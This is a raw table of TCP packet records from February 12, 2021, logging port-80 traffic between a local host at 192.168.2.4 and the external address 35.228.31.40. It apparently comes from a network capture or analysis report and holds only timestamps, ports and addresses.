Feb 12, 2021 01:48:01.421099901 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.421116114 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.421145916 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.421181917 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.421194077 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.422573090 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.422624111 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.422658920 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.422687054 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.422697067 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.422745943 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.422754049 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.422796965 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.422805071 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.422847033 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.422853947 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.422895908 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.422904015 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.422945976 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.422951937 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.422995090 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.423002005 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.423049927 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.423052073 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.423121929 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.458408117 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.458468914 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.458511114 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.458570004 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.458579063 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.458601952 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.458606958 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.458645105 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.458663940 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.458707094 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.458718061 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.458759069 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.458767891 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.458806992 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.458816051 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.458848000 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.458864927 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.458908081 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.495529890 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.495589972 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.495649099 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.495698929 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.495698929 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.495731115 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.495754004 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.495788097 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.495810032 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.495815039 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.495865107 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.495868921 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.495915890 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.495925903 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.495965958 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.495974064 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.496014118 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.496023893 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.496058941 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.496088982 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.496110916 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.496223927 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.500849009 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.500911951 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.500935078 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.500967026 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.500969887 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.501013041 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.501029968 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.501065969 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.501070976 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.501116991 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.501120090 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.501161098 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.501173973 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.501215935 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.501219988 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.501260042 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.501308918 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.501319885 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.501324892 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.501368046 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.501432896 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.501452923 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.501513958 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.503737926 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.503778934 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.503834963 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.503844976 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.503861904 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.503885984 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.503892899 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.503935099 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.503993988 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.505650043 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.510288954 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.533202887 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.533377886 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.541138887 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.541188002 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.541228056 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.541270018 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.541310072 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.541332006 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.541347027 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.541362047 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.541368008 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.541372061 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.541421890 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.541471004 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.541477919 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.541515112 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.541528940 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.541553020 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.541583061 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.541593075 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.541632891 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.541637897 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.541672945 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.541685104 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.543284893 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.543327093 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.543364048 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.543374062 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.543396950 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.543411970 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.543416023 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.543456078 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.543498039 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.543515921 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.545830965 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.550292015 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.570291996 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.572329998 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.580065012 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.580137014 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.580194950 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.580255032 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.580279112 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.580307961 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.580315113 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.580319881 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.580379009 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.580380917 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.580431938 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.580434084 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.580476046 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.580488920 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.580514908 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.580523014 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.580554962 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.580564022 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.580593109 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.580611944 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.580642939 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.580650091 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.580693960 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.582811117 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.582866907 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.582931042 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.582993031 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.583035946 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.583143950 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.584391117 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.589462042 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.607877016 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.608100891 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.620254040 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.620315075 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.620356083 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.620394945 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.620433092 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.620438099 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.620474100 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.620476007 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.620481968 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.620512962 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.620529890 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.620562077 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.620563030 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.620615959 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.620630026 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.620682955 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.620765924 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.620806932 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.620821953 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.620846987 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.620857000 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.620902061 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.621851921 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.621895075 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.621928930 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.621933937 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.621939898 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.621982098 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.621989012 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.622023106 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.622034073 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.622062922 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.622080088 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.622106075 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.622113943 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.622144938 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.622158051 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.622181892 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.622196913 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.622231960 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.622246981 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.622271061 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.622286081 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.622302055 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.622323990 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.622354984 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.624448061 CET	49762	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.687486887 CET	49763	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.698935986 CET	80	49762	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.775217056 CET	80	49763	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:01.775316954 CET	49763	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.776653051 CET	49763	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:01.854116917 CET	80	49763	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:03.849395037 CET	49764	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:03.849606037 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:03.926315069 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:03.926585913 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:03.927463055 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:03.929124117 CET	80	49764	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:03.929271936 CET	49764	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.043823004 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.369791031 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.369837999 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.369863987 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.369890928 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.369918108 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.369942904 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.369952917 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.370009899 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.370018005 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.370023012 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.370028019 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.370032072 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.409495115 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.409560919 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.409615040 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.409655094 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.413561106 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.413587093 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.413589001 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.413590908 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.444514036 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.444576979 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.444616079 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.444617033 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.444648981 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.444657087 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.444674015 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.444695950 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.444715977 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.444736958 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.444741964 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.444775105 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.444786072 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.444823027 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.444823980 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.444863081 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.444881916 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.444936037 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.453533888 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.453594923 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.453599930 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.453646898 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.488059998 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.488085985 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.488100052 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.488111973 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.488120079 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.488197088 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.488224030 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.489015102 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.489130020 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.489147902 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.489162922 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.489190102 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.489217043 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.519236088 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.519259930 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.519279957 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.519299984 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.519316912 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.519321918 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.519336939 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.519357920 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.519361019 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.519375086 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.519390106 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.519392967 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.519409895 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.519411087 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.519432068 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.519443035 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.519449949 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.519468069 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.519475937 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.519486904 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.519496918 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.519503117 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.519527912 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.519563913 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.562664986 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.562695026 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.562711954 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.562731028 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.562747955 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.562768936 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.562783957 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.562789917 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.562808037 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.562824011 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.562827110 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.562845945 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.562859058 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.562863111 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.562875032 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.562884092 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.562906027 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.562918901 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.562921047 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.562937975 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.562954903 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.563007116 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.563025951 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.564840078 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.564861059 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.564876080 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.564913034 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.564933062 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.572396040 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.572422981 CET	80	49765	35.228.31.40	192.168.2.4
